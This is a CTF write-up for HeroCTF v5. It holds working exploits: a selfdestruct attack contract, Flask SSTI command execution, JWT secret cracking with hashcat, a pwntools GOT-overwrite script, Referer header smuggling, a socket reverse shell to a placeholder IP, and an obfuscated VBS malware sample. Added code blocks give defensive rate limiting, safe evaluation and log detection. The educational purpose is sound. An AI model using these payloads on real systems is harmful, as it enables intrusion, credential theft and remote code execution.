HeroCTF v5 Writeup

Posted by admin on 2023-05-16 23:32:05

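Statement

Author: CTF team

This article is part of the Wolf Group Security (狼组安全) community original-content reward program; reproduction without permission is prohibited.

The user bears sole responsibility for any direct or indirect consequences and losses caused by spreading or using the information provided in this article; the Wolf Group Security team and the author accept no liability for them.

The Wolf Group Security team reserves the right to modify and interpret this article. Anyone reproducing or distributing it must keep it complete, including the copyright notice. Without the team's permission, the content may not be modified, added to or removed from, nor used for commercial purposes in any way.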



Preface

HeroCTF v5

Saturday, 13 May 2023, 03:00 to Monday, 15 May 2023, 05:00.


https://ctf.heroctf.fr

Blockchain

Challenge 00 : Oh sh. Here we go again

Challenge

[Image: challenge description]

Solution

After deployment only the contract address is known, so the contract has to be decompiled.

// Decompiled by library.dedaub.com
// 2023.05.12 19:25 UTC
// Compiled using the solidity compiler version 0.8.17


// Data structures and variables inferred from the use of storage instructions
uint256 _win; // STORAGE[0x0] bytes 0 to 0
uint256 stor_0_1_1; // STORAGE[0x0] bytes 1 to 1



function () public payable { 
    revert();
}

function 0x3c5269d8() public payable { 
    _win = 1;
}

function 0x459a2790() public payable { 
    return stor_0_1_1;
}

function win() public payable {
    v0 = v1 = _win;
    if (v1) {
        v0 = stor_0_1_1;
    }
    return bool(v0);
}

function 0x75ec067a() public payable { 
    if (_win) {
        stor_0_1_1 = 1;
    }
}

function 0xe9a37061() public payable { 
    return _win;
}

// Note: The function selector is not present in the original solidity code.
// However, we display it for the sake of completeness.

function __function_selector__(bytes4 function_selector) public payable { 
    MEM[64] = 128;
    require(!msg.value);
    if (msg.data.length >= 4) {
        if (0x3c5269d8 == function_selector >> 224) {
            0x3c5269d8();
        } else if (0x459a2790 == function_selector >> 224) {
            0x459a2790();
        } else if (0x473ca96c == function_selector >> 224) {
            win();
        } else if (0x75ec067a == function_selector >> 224) {
            0x75ec067a();
        } else if (0xe9a37061 == function_selector >> 224) {
            0xe9a37061();
        }
    }
    ();
}

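The functions of interest are:

function 0x3c5269d8() public payable: sets the _win variable to 1.
function 0x459a2790() public payable: returns the value of stor_0_1_1.
function 0x75ec067a() public payable: if _win is true, sets stor_0_1_1 to 1.
function 0xe9a37061() public payable: returns the value of _win.

The goal is presumably just to set both _win and stor_0_1_1 to 1: send the hex calldata for the two function calls in two transactions via MetaMask to set the variables.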

Challenge 01 : Classic one tbh

Challenge

[Image: challenge description]

Solution

Contract source code:

pragma solidity 0.8.17;

contract  hero2303
 {
    mapping (address => uint256) private userBalances;

    uint256 public constant TOKEN_PRICE = 1 ether;
    string public constant name = "UNDIVTOK";
    string public constant symbol = "UDK";
    
    uint8 public constant decimals = 0;

    uint256 public totalSupply;

    function buy(uint256 _amount) external payable {
        require(
            msg.value == _amount * TOKEN_PRICE, 
            "Ether submitted and Token amount to buy mismatch"
        );

        userBalances[msg.sender] += _amount;
        totalSupply += _amount;
    }

    function sell(uint256 _amount) external {
        require(userBalances[msg.sender] >= _amount, "Insufficient balance");

        userBalances[msg.sender] -= _amount;
        totalSupply -= _amount;

        (bool success, ) = msg.sender.call{value: _amount * TOKEN_PRICE}("");
        require(success, "Failed to send Ether");

        assert(getEtherBalance() == totalSupply * TOKEN_PRICE);
    }

    function transfer(address _to, uint256 _amount) external {
        require(_to != address(0), "_to address is not valid");
        require(userBalances[msg.sender] >= _amount, "Insufficient balance");
        
        userBalances[msg.sender] -= _amount;
        userBalances[_to] += _amount;
    }

    function getEtherBalance() public view returns (uint256) {
        return address(this).balance;
    }

    function getUserBalance(address _user) external view returns (uint256) {
        return userBalances[_user];
    }
}

The vulnerability is in the sell function:

function sell(uint256 _amount) external {
        require(userBalances[msg.sender] >= _amount, "Insufficient balance");

        userBalances[msg.sender] -= _amount;
        totalSupply -= _amount;

        (bool success, ) = msg.sender.call{value: _amount * TOKEN_PRICE}("");
        require(success, "Failed to send Ether");

        assert(getEtherBalance() == totalSupply * TOKEN_PRICE);
    }
assert(getEtherBalance() == totalSupply * TOKEN_PRICE);

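The assert requires the Ether locked in the contract to match the total supply (getEtherBalance() == totalSupply * TOKEN_PRICE). The challenge goal is to make sell fail for anyone who calls it, so we only need to use selfdestruct to force Ether into the contract and break the token balance invariant, after which nothing can be sold.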

pragma solidity 0.8.17;

contract Attack {
    address tokenaddr;

    constructor(address _tokenaddr) {
        tokenaddr = _tokenaddr;
    }

    function attack() external payable {
        require(msg.value != 0, "Error");

        address payable target = payable(tokenaddr);
        selfdestruct(target);
    }
}

WEB

Best Schools

Challenge

[Image: challenge description]

Solution

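Solution 1: brute force through a proxy pool to bypass the per-IP rate limit (unintended)

Brute-force requests are rate-limited, so rotating through a proxy pool is enough. (The intended approach should be GraphQL injection.)

Solution 2: GraphQL batched queries

GraphQL allows several query requests to be sent in the same HTTP request: just send the query requests as an array.

Single query request:

{"query":"mutation { increaseClickSchool(schoolName: \"Flag CyberSecurity School\"){schoolId, nbClick} }"}

Batched query request:

[
  {"query":"mutation { increaseClickSchool(schoolName: \"Flag CyberSecurity School\"){schoolId, nbClick} }"},
  {"query":"mutation { increaseClickSchool(schoolName: \"Flag CyberSecurity School\"){schoolId, nbClick} }"},
  ...
]

Using the Character blocks payload type in Intruder completes the brute force. Multiple query requests are sent successfully in one HTTP request, and the flag is returned.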
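
The batching above works because the limiter counts HTTP requests while the server executes every entry of the array. As an added example (not code from the challenge), the limiter below charges one unit per GraphQL operation and caps the batch size; the limits, status codes and client addresses are assumptions.

```python
import json
import time
from collections import defaultdict, deque

MAX_BATCH = 5             # assumed policy: operations allowed in one HTTP request
MAX_OPS_PER_WINDOW = 10   # assumed policy: operations allowed per client per window
WINDOW_SECONDS = 60.0     # assumed window length


def count_operations(body):
    """Return how many GraphQL operations a single HTTP request body carries."""
    payload = json.loads(body)
    if isinstance(payload, dict):          # ordinary, non-batched request
        payload = [payload]
    if not isinstance(payload, list) or not payload:
        raise ValueError("body must be a query object or a non-empty array")
    for entry in payload:
        if not isinstance(entry, dict) or not isinstance(entry.get("query"), str):
            raise ValueError("every batch entry needs a 'query' string")
    return len(payload)


class OperationRateLimiter:
    """Sliding-window limiter that counts operations instead of HTTP requests."""

    def __init__(self, max_ops=MAX_OPS_PER_WINDOW, window=WINDOW_SECONDS,
                 max_batch=MAX_BATCH):
        self.max_ops = max_ops
        self.window = window
        self.max_batch = max_batch
        self._accepted = defaultdict(deque)   # client -> timestamps of accepted ops

    def check(self, client, body, now=None):
        """Return (status, reason) for one HTTP request from `client`."""
        now = time.monotonic() if now is None else now
        try:
            ops = count_operations(body)
        except ValueError:                 # json.JSONDecodeError is a ValueError too
            return 400, "malformed GraphQL request"
        if ops > self.max_batch:
            return 413, "batch of %d operations exceeds %d" % (ops, self.max_batch)
        stamps = self._accepted[client]
        while stamps and now - stamps[0] >= self.window:
            stamps.popleft()               # forget operations outside the window
        if len(stamps) + ops > self.max_ops:
            return 429, "operation rate limit exceeded"
        stamps.extend([now] * ops)         # a batch of N costs N units
        return 200, "accepted %d operation(s)" % ops


# Constructed request bodies that reuse the mutation shown above.
MUTATION = ('mutation { increaseClickSchool(schoolName: '
            '"Flag CyberSecurity School"){schoolId, nbClick} }')
SINGLE = json.dumps({"query": MUTATION})


def batch_of(n):
    """Build a batched body with n copies of the mutation."""
    return json.dumps([{"query": MUTATION}] * n)


if __name__ == "__main__":
    limiter = OperationRateLimiter()
    for label, body in (("batch of 50", batch_of(50)), ("batch of 5", batch_of(5)),
                        ("batch of 5", batch_of(5)), ("single", SINGLE)):
        print(label, limiter.check("198.51.100.9", body, now=0.0))
```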

Referrrrer

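Challenge

[Image: challenge description]

Solution

This challenge is a Node.js application built on the Express framework with an Nginx proxy in front of it: user request -> Nginx proxy -> Express application.

In the Nginx configuration, the /admin endpoint only forwards HTTP requests whose Referer header value is https://admin.internal.com/.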

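location /admin {
    if ($http_referer !~* "^https://admin.internal.com") {
        return 403;
    }
    # the rest of the location block is not shown in the writeup
}

The Node.js source, in turn, only returns the HTTP response containing the FLAG to requests whose Referer header value is YOU_SHOUD_NOT_PASS!.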

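app.get("/admin", (req, res) => {
    if (req.header("referer") === "YOU_SHOUD_NOT_PASS!") {
        return res.send(process.env.FLAG);
    }
});

Normally, getting the same request header read as different values by Nginx and Express requires a difference in how Nginx and Express parse the Referer header.

The Referer request header is the HTTP header field officially defined in the RFCs for recording the address a request came from. Referer is actually a misspelling of the word Referrer, which is a historical legacy.

Before Express 6.0, the Express developers added support for both spellings on their own, and Referrer even takes priority over the officially specified Referer (https://github.com/expressjs/express/issues/3951). Nginx follows the RFCs strictly and does not treat the seemingly correct spelling Referrer as the Referer field.

Using this difference, both Referer checks can be bypassed: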

GET /admin HTTP/1.1
Host: app
Referer: https://admin.internal.com/
Referrer: YOU_SHOUD_NOT_PASS!
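
The mismatch can be reproduced with a small model of the two layers. This is an added example, not code from the challenge: express_header() mirrors the alias behaviour described above, FLAG is a placeholder, and the two mitigation switches (dropping Referrer at the proxy, reading the raw Referer header in the app) are assumptions about how one might close the gap.

```python
import re

# Regex from the nginx location block above; "!~*" is a case-insensitive non-match.
NGINX_REFERER_RE = re.compile(r"^https://admin.internal.com", re.IGNORECASE)
FLAG = "FLAG{constructed-placeholder}"   # stands in for process.env.FLAG

# The request from the writeup, embedded as sample input.
REQUEST = (
    "GET /admin HTTP/1.1\n"
    "Host: app\n"
    "Referer: https://admin.internal.com/\n"
    "Referrer: YOU_SHOUD_NOT_PASS!\n"
)


def parse_headers(raw_request):
    """Parse the header lines of a raw HTTP/1.1 request into a lower-cased dict."""
    headers = {}
    for line in raw_request.strip().splitlines()[1:]:
        if not line.strip():
            break                          # blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


def nginx_gate(headers):
    """$http_referer only reflects the header literally named Referer."""
    return NGINX_REFERER_RE.search(headers.get("referer", "")) is not None


def express_header(headers, name):
    """Model of req.header(): both spellings are aliases and 'referrer' wins."""
    key = name.lower()
    if key in ("referer", "referrer"):
        return headers.get("referrer") or headers.get("referer")
    return headers.get(key)


def serve(raw_request, proxy_strips_referrer=False, app_reads_raw_header=False):
    """Run one request through the proxy check and then the application check."""
    headers = parse_headers(raw_request)
    if proxy_strips_referrer:
        # Assumed mitigation: the proxy does not forward the alias header
        # (in nginx, proxy_set_header with an empty value drops a header).
        headers.pop("referrer", None)
    if not nginx_gate(headers):
        return 403, ""
    if app_reads_raw_header:
        # Assumed mitigation: read the exact header, like req.headers.referer.
        seen = headers.get("referer")
    else:
        seen = express_header(headers, "referer")
    if seen == "YOU_SHOUD_NOT_PASS!":
        return 200, FLAG
    # The writeup does not show the non-matching branch; an empty body stands in.
    return 200, ""


if __name__ == "__main__":
    print("as deployed:        ", serve(REQUEST))
    print("proxy drops alias:  ", serve(REQUEST, proxy_strips_referrer=True))
    print("app reads raw field:", serve(REQUEST, app_reads_raw_header=True))
```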


Drink from my Flask#1

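Challenge

[Image: challenge description]

Solution

The URI is vulnerable to SSTI, with the template content limited to 30 bytes: http://DOMAIN/{{config}}

Another endpoint, /adminPage, reports that the guest user cannot access it; the identity is carried in the JWT issued by the service.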

Cookie: token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.AdxhLneoWOkeXGQFwWUbDzS3J2W6_Re-NbZLP_SRUww

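Header:
{
    "typ": "JWT",
    "alg": "HS256"
}
Payload:
{
    "role": "guest"
}
Signature:
AdxhLneoWOkeXGQFwWUbDzS3J2W6_Re-NbZLP_SRUww

Because the SSTI is limited to 34 bytes, there are two approaches: 1. bypass the length limit and read the flag; 2. use the SSTI to obtain the JWT secret_key, change role to admin and sign the token with the key.

Solution 1: RCE through the 34-byte SSTI

Use config.update as a cache to create variables: store config.update itself first, then use it to store a __globals__ object.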

https://flask.palletsprojects.com/en/2.0.x/config/
{{config.update(a=config.update)}}

{{config.a(b=lipsum.__globals__)}}
{{config.a(c=config.b.os)}}
{{config.a(d=config.c.popen)}}

Reading flag.txt is also subject to the length limit, so read it with cat f*t:

/{{config.d('cat f*t').read()}}
Solution 2: weak JWT key; the role field in the token data segment is an RCE point with no length limit

Crack the JWT with Hashcat and a weak-password wordlist:

hashcat -a 0 -m 16500 eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJyb2xlIjoiZ3Vlc3QifQ.AdxhLneoWOkeXGQFwWUbDzS3J2W6_Re-NbZLP_SRUww ~/Github/brute_dict/jwt.secrets.list

This gives the secret key: key. Signing a token at https://jwt.io/ with the key "key" shows that the role field is echoed back in the response. This is therefore an SSTI injection point with no length limit; sign a token carrying the SSTI payload with the key and send it:

{{self.__init__.__globals__.__builtins__.__import__('os').popen('cat flag*').read()}}


Pwn

Appointment Book

Challenge

[Image: challenge description]

Solution

Work backwards from the timestamp to assemble the bin_sh address; a binary search finds it directly.

#!/usr/bin/python2
from pwn import *
context(arch='amd64',endian='el',os='linux')
context.log_level='debug'
context.terminal = ['tmux','splitw','-h']

# Helper lambdas for leaking addresses and talking to the process
l64 = lambda     :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda     :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
leak  = lambda name,data : p.success(name + ": 0x%x" % data)
sd  = lambda payload: p.send(payload)
sa  = lambda a,b :p.sendafter(str(a),str(b))
sl  = lambda payload: p.sendline(payload)
sla = lambda a,b :p.sendlineafter(str(a),str(b))
ru  = lambda a     :p.recvuntil(str(a))
r  = lambda a     :p.recv(a)

debug = 2
if debug == 1:
    p = process(['./chall'])
else:
    p = remote('static-03.heroctf.fr',5000)
elf = ELF('./chall',checksec=False)
# libc = ELF("/lib/x86_64-linux-gnu/libc.so.6",checksec=False)
bin_sh = 0x00000000040133E
# 4170422
sla("Your choice: ",2)
sla("Enter the index of this appointment (0-7): ",-13)
pd = "1970-02-18 14:27:02"
# gdb.attach(p,'b *0x0000000000401611\nc')
sla("[+] Enter a date and time (YYYY-MM-DD HH:MM:SS):",pd)
# sl("")
sleep(0.02)
sla("[+] Enter an associated message (place, people, notes...):",'a')
p.interactive()

flag:

Hero{Unch3ck3d_n3g4t1v3_1nd3x_1nt0_G0T_0v3wr1t3_g03s_brrrrrr}

Prog

Math Trap

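Challenge

[Image: challenge description]

Solution

The challenge sends formulas that have to be computed. The script takes the formula sent by the remote server as a string and evaluates it with eval.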

# coding=utf-8
from pwn import *

r = remote('static-01.heroctf.fr', 8000)

def calculate(formula):
    # Check that the input only contains allowed characters
    allowed_chars = set('0123456789.+-*/() ')
    if not set(formula) <= allowed_chars:
        raise ValueError('Illegal characters in formula')

    # Execute the input string as Python code and get the result
    try:
        result = eval(formula)
    except ZeroDivisionError:
        raise ValueError('Division by zero')
    except Exception as e:
        raise ValueError(f'Error during calculation: {str(e)}')

    return result

while True:
    # Receive the data returned over the remote connection
    content = r.recv().decode()
    if not content:
        break
    print(content)
    formula = content.split('\n')[-2]
    #print(formula)
    if formula:
        # Evaluate the formula
        result = calculate(formula)
        print(f"计算结果为:{result}")
        # Send the result to the remote host
        r.sendline(str(result).encode())
# Close the remote connection
r.close()
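
The character whitelist in calculate() still passes server-controlled text to eval, and it admits "**", so a line such as 9**9**9**9 would pass the check and stall the solver. As an added example (not part of the original script), the evaluator below walks the parsed AST instead and only accepts numeric literals and bounded arithmetic; the four MAX_ limits are assumptions.

```python
import ast
import operator

MAX_LENGTH = 200        # assumed bound on one formula line
MAX_DEPTH = 50          # assumed bound on expression nesting
MAX_POW_BASE = 10 ** 6  # assumed bounds that keep "**" cheap
MAX_POW_EXP = 64

_BINARY_OPS = {
    ast.Add: operator.add,
    ast.Sub: operator.sub,
    ast.Mult: operator.mul,
    ast.Div: operator.truediv,
    ast.FloorDiv: operator.floordiv,
    ast.Mod: operator.mod,
}
_UNARY_OPS = {ast.UAdd: operator.pos, ast.USub: operator.neg}


def safe_eval(formula):
    """Evaluate an arithmetic formula without ever calling eval()."""
    if len(formula) > MAX_LENGTH:
        raise ValueError("formula too long")
    try:
        tree = ast.parse(formula.strip(), mode="eval")
    except (SyntaxError, MemoryError, RecursionError) as exc:
        raise ValueError("not a valid expression") from exc
    return _evaluate(tree.body, 0)


def _evaluate(node, depth):
    if depth > MAX_DEPTH:
        raise ValueError("expression nested too deeply")
    if isinstance(node, ast.Constant):
        # bool, str, bytes, complex and None literals are all refused
        if type(node.value) in (int, float):
            return node.value
        raise ValueError("only int and float literals are allowed")
    if isinstance(node, ast.UnaryOp) and type(node.op) in _UNARY_OPS:
        return _UNARY_OPS[type(node.op)](_evaluate(node.operand, depth + 1))
    if isinstance(node, ast.BinOp):
        left = _evaluate(node.left, depth + 1)
        right = _evaluate(node.right, depth + 1)
        try:
            if isinstance(node.op, ast.Pow):
                # Check the operands before computing, so a huge power is
                # rejected without spending any time on it.
                if (abs(left) > MAX_POW_BASE or not isinstance(right, int)
                        or abs(right) > MAX_POW_EXP):
                    raise ValueError("exponentiation outside the allowed range")
                return left ** right
            op = _BINARY_OPS.get(type(node.op))
            if op is not None:
                return op(left, right)
        except ZeroDivisionError:
            raise ValueError("Division by zero")
    # Names, calls, attributes, subscripts, comparisons, lambdas and so on
    raise ValueError("unsupported syntax: " + type(node).__name__)


def is_rejected(formula):
    """Return True when safe_eval refuses the formula."""
    try:
        safe_eval(formula)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed inputs: two ordinary formulas and three that must be refused.
    for text in ("2 + 3 * 4", "(7 - 10) / 2", "9**9**9**9",
                 "__import__('os').getcwd()", "1/0"):
        try:
            print(repr(text), "->", safe_eval(text))
        except ValueError as err:
            print(repr(text), "-> rejected:", err)
```

In the solver loop, safe_eval(formula) can replace calculate(formula) without other changes, since both raise ValueError on bad input.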


Forensic

dev.corp 1/4

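Challenge

[Image: challenge description]

Solution

This is a log-analysis challenge. Start by searching for GET or POST requests; the attacker requested admin-ajax.php many times. Filtering on admin-ajax.php and keeping the requests that returned successfully finds the answer. Three files were requested; the challenge asks for the most sensitive one, so the answer is id_rsa_backup. The admin-ajax.php requests also make it possible to look up the corresponding CVE number.

Hero{CVE-2020-11738:/home/webuser/.ssh/id_rsa_backup}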
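
The filtering described above can be scripted. This is an added example, not the author's tooling: it assumes the log is in Combined Log Format, the sample lines are constructed (including their IP addresses and the action/file parameter names), and PRIVATE_KEY_HINTS is an assumed list of what counts as most sensitive.

```python
import posixpath
import re
from urllib.parse import parse_qsl, urlsplit

# Combined Log Format: ip ident user [time] "METHOD url PROTO" status size ...
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Constructed sample lines (not taken from the challenge's log file).
SAMPLE_LOG = """\
203.0.113.7 - - [13/May/2023:09:58:11 +0000] "GET /wp-login.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [13/May/2023:10:01:42 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 400 1 "-" "Mozilla/5.0"
198.51.100.23 - - [13/May/2023:10:02:05 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 58 "-" "Mozilla/5.0"
203.0.113.7 - - [13/May/2023:10:03:10 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../etc/shadow HTTP/1.1" 500 0 "-" "Mozilla/5.0"
203.0.113.7 - - [13/May/2023:10:03:19 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../../../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.7 - - [13/May/2023:10:04:02 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2Fhome%2Fwebuser%2F.ssh%2Fid_rsa_backup HTTP/1.1" 200 2602 "-" "Mozilla/5.0"
"""

# Assumed markers for the "most sensitive" class of file: private key material.
PRIVATE_KEY_HINTS = ("/.ssh/", "id_rsa", "id_ed25519", ".pem")


def successful_traversals(lines):
    """Return admin-ajax.php requests that answered 200 and carried a path
    traversal (or absolute path) in any query parameter."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match or match["status"] != "200":
            continue
        url = urlsplit(match["url"])
        if not url.path.endswith("/admin-ajax.php"):
            continue
        for param, value in parse_qsl(url.query):   # parse_qsl percent-decodes
            if ".." in value.split("/") or value.startswith("/"):
                hits.append({
                    "ip": match["ip"],
                    "time": match["time"],
                    "param": param,
                    # Collapse the "../" run to see which file was actually read
                    "path": posixpath.normpath("/" + value.lstrip("/")),
                })
    return hits


def most_sensitive(hits):
    """Keep only the hits whose resolved path looks like private key material."""
    return [h for h in hits
            if any(hint in h["path"] for hint in PRIVATE_KEY_HINTS)]


if __name__ == "__main__":
    found = successful_traversals(SAMPLE_LOG.splitlines())
    for hit in found:
        print(hit["time"], hit["ip"], hit["param"], hit["path"])
    print("most sensitive:", [h["path"] for h in most_sensitive(found)])
```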

SYSTEM

Chm0d

Challenge

[Image: challenge description]

Solution

http://www.fblinux.com/?p=30

SUDOkLu

Challenge

[Image: challenge description]

Solution

user@sudoklu:~$ sudo -l
Matching Defaults entries for user on sudoklu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin, use_pty

User user may run the following commands on sudoklu:
    (privilegeduser) NOPASSWD: /usr/bin/socket

Use socket to get a reverse shell as privilegeduser:

sudo -u privilegeduser /usr/bin/socket -qvp '/bin/sh -i' xxx.xxx.xxx.xxx 12345

Misc

PNG-G

Challenge

[Image: challenge description]

Solution

The file is an APNG; opening it in an APNG viewer shows the flag: https://products.aspose.app/imaging/zh-hans/image-view/apng

PDF-Mess

Challenge

[Image: challenge description]

Solution

binwalk extracts a JS file:

const CryptoJS=require('crypto-js'),key='3d3067e197cf4d0a',ciphertext=CryptoJS['AES']['encrypt'](message,key)['toString'](),cipher='U2FsdGVkX1+2k+cHVHn/CMkXGGDmb0DpmShxtTfwNnMr9dU1I6/GQI/iYWEexsod';

Decrypting with crypto-js gives the result: https://tool.oschina.net/encrypt/

Subliminal#2

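Challenge

[Image: challenge description]

Solution

The file is an mp4 in which a small square keeps appearing; the challenge states that it is 20x20 pixels.

First, split the video into individual frames: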

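import cv2

# Read the video file
cap = cv2.VideoCapture('video.mp4')

# Frame counter
frame_count = 0

while cap.isOpened():
    # Read the video frame by frame
    ret, frame = cap.read()

    if not ret:
        break

    # Save the current frame as an image named after the frame number
    cv2.imwrite('frame_{}.jpg'.format(frame_count), frame)

    # Increment the frame counter
    frame_count += 1

# Release resources
cap.release()

Then extract the small squares in order from top-left to bottom-right and stitch them into one image: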

import cv2
import numpy as np

# Empty list that will hold all the small squares
block_list = []

# Go through every frame and read its small square
for i in range(2304):
    # Read the image of the current frame
    frame = cv2.imread('frame_{}.jpg'.format(i))

    # Extract the small square: top-left corner (x, y), size (w, h)
    x, y = (i % 64) * 20, (i // 64) * 20
    w, h = 20, 20
    block = frame[y:y+h, x:x+w]

    # Append the small square to the list
    block_list.append(block)

# Compute the size of the output image
rows = 36
cols = 64
output_size = (cols * 20, rows * 20)

# Initialise a blank canvas
canvas = np.zeros((output_size[1], output_size[0], 3), dtype=np.uint8)

# Paste the small squares onto the canvas
for i in range(rows):
    for j in range(cols):
        canvas[(i*20):(i+1)*20, (j*20):(j+1)*20] = block_list[i*cols+j]

# Show the stitched image
cv2.imshow('Canvas', canvas)
cv2.waitKey(0)
cv2.destroyAllWindows()

# Save the stitched image
cv2.imwrite("output.jpg", canvas)

Reverse

Give My Money Back

Challenge

[Image: challenge description]

Solution

Extracting the archive gives a VBS script:

dIM jJkmPKZNvhSgPGmVLdvBVgOimreRTqiaEDiOcfNqy, AxEjAhgOVVhnXPrQQdPpAItXlqhuIRHOuDWWhvoyp, FwwcltIiESLKzggUCrjiaEUtjbmpvvGzwJNhoLFSp
Sub FncTqZirWltYCeayCzqdIRdKqrIzaKWRIZbSCprXS
85*36519/329*-7189+7289*931665/8873*-7248+7358*9013-8899*-7595+7696*397152/3546*-5882+5993*7728-7614*1020452/8797*-4845+4891*-7532+7654*3369-3264*-4572+4684*311202/9153*-3565+3575*1025325/9765*-3536+3613*5977-5862*-2920+3023*442934/9629*6907-6842*153100/1531*-8662+8762*75660/1164*9114-8998*450196/3881*-8389+8486*-8357+8456*2757-2653*236530/2170*121402/1202*-2528+2638*230608/1988*-6468+6500*55488/1632*-5636+5704*-7693+7751*-3748+3840*275910/3246*9002-8887*220887/2187*7609-7495*5450-5335*22540/245*4167-4133*-2319+2351*-4913+4951*41888/1309*6132-6017*862692/7437*97584/856*-7036+7121*-165+280*4317-4216*9853-9739*3165-3087*9460-9363*1967-1858*1971-1870*-9821+9853*-731+769*310-278*260100/7650*9149-9057*316225/4865*803824/7177*887152/7921*-901+969*107573/1109*86884/749*8651-8554*8501-8409*6706-6630*6433-6322*390555/3945*5810-5713*4162-4054*-1967+2059*1051725/9475*653700/6537*308-203*763510/6941*3556-3464*576312/5192*905500/9055*-6307+6412*952490/8659*665760/5840*997678/9878*-8980+9092*-3645+3756*7518-7404*3835-3719*291318/6333*-4226+4348*991200/9440*261296/2333*1768-1734*9002-8992*431655/4111*-3533+3610*-4070+4185*5303-5200*230414/5009*-4638+4703*-1871+1971*544700/5447*9765-9700*-5390+5506*-8226+8342*222227/2291*8208-8109*-4446+4550*8109-8000*5536-5435*255420/2322*2899-2783*8627-8595*27506/809*6130-6063*248182/4279*817052/8881*229-144*-8947+9062*688012/6812*817152/7168*981065/8531*849620/9235*196316/5774*27808/869*-3958+3996*60256/1883*7442-7327*121684/1049*502284/4406*793390/9334*-5531+5646*-2111+2212*614802/5393*4013-3935*-9320+9417*1014899/9311*6851-6750*251680/7865*-7710+7748*8283-8251*-7814+7848*-3575+3667*120315/1851*-1558+1670*-5154+5266*6372-6304*4909-4812*763396/6581*8700-8603*8485-8393*4779-4697*964590/8690*4356-4259*369510/3390*-9809+9914*-1525+1635*-9541+9644*133952/1456*-7503+7569*151095/1439*5249-5133*-2331+2430*824508/7428*-1644+1749*303380/2758*4615-4523*-7270+7389*-6492+6589*965628/8941*518724/4803*-5457+5558*-1333+1449*-8773+8819*-9847+9947*1214-1117*-269
4+2810*6286-6252*-6111+6121*540855/5151*9808-9731*2233-2118*-2649+2752*134458/2923*386815/5951*-8893+8993*944800/9448*266175/4095*2059-1943*7522-7406*2283-2186*94446/954*9404-9300*-5548+5657*-1651+1752*-4195+4305*2909-2793*169536/5298*-7616+7650*8017-7950*-6255+6313*9486-9394*386070/4542*-7451+7566*779922/7722*9677-9563*389505/3387*-6200+6292*-8178+8212*51392/1606*328624/8648*5048-5016*-1241+1356*-785+901*1010610/8865*-6808+6893*9248-9133*9902-9801*930126/8159*3696-3618*-2332+2429*-3235+3344*-1652+1753*1599-1567*79344/2088*-1113+1145*-6125+6159*5755-5663*4512-4447*409808/3659*846272/7556*-158+226*764457/7881*98948/853*-5215+5312*6171-6079*2397-2315*1088355/9805*-5304+5401*-2078+2187*64365/613*5301-5191*8074-7971*59064/642*147522/2138*1409-1301*9335-9234*374814/3786*4344-4228*5854-5740*2838-2721*-4566+4675*563040/6120*8428-8309*826828/8524*-6258+6366*-1624+1732*3979-3878*-4184+4300*2047-1932*-5648+5740*8190-8090*820322/8122*4850-4748*-6814+6911*3196-3079*-676+784*-8483+8599*500555/5269*-5567+5686*7448-7351*-9488+9596*-2319+2427*8614-8513*875568/7548*8759-8725*94110/9411*4020-3915*-1870+1947*5059-4944*-3964+4067*445648/9688*307847/3709*297445/2945*8544-8434*370300/3703*78830/7883*4949-4939*87930/8793*-4282+4292*557760/6720*972933/9633*6306-6190*3174-3142*-3321+3430*668430/9549*-1832+1915*7360-7281*6648-6616*518012/8492*5290-5258*8085-8018*-558+672*-1896+1997*-4519+4616*-5924+6040*539-438*-5251+5330*475594/4853*-3759+3865*937-836*194139/1961*647512/5582*-4260+4300*5363-5329*7619-7536*556380/5620*361494/3171*-2638+2743*7771-7659*-1302+1418*754530/7186*18700/170*6977-6874*-6256+6302*169330/2419*448035/4267*280152/2594*67569/669*262363/3161*1129172/9332*9561-9446*369808/3188*3666-3565*780876/7164*-2894+2973*4633-4535*883192/8332*-9212+9313*-6690+6789*6703-6587*2591-2557*-9564+9605*2434-2424*-8734+8744*-391+458*-3764+3861*999540/9255*9542-9434*6111-6079*9717-9608*8366-8296*414917/4999*-3749+3828*136022/2957*188972/2779*743158/7358*7297-7189*110898/1098*-5193+5309*672761/66
61*-7908+7978*682605/6501*-1173+1281*6223-6122*8607-8567*6991-6904*1656-1573*-118+217*7148-7034*-857+962*-4816+4928*-8297+8413*-6621+6667*-3618+3701*7964-7865*160056/1404*-2953+3058*4898-4786*534412/4607*-6243+6313*-8490+8607*171828/1591*1350-1242*87360/1120*-9362+9459*-8716+8825*2299-2198*-5581+5625*7758-7726*-2470+2554*-6374+6488*-1107+1224*-5495+5596*2065-2024"
axEjahGoVVhnxPRQQDPPaiTXLQhUIRhouDwwHvOyp = splIt(jjkMPKzNVhSgpGmvLdVBVGOimrerTQIaeDiocFNQY, chr(eVaL(75684/1802)))
for each MqNbrDAQjYRIwUnepBXnOsmlQlLuaaeTTwAchSFjz In AxEjahGovVHNxprqQdPPAITXLqhuiRHOuDwwhVOyP
FWwCltIiEsLkZgGUCRjiAEuTJbMpVVgZwJNhOLFSp = fwWCLtIieslKZgGUcrjIaEUTJBmPvvgZwjNHoLfSp & Chr(eVaL(MqnBrdaqjYRIwUnEPBxnoSMlqLluAaeTtwAchSFJz))
NEXT
lxtvaQuFKFKhmxjWgYFOSFuWJcYbTRdpUPuDAdnmD
end SUb
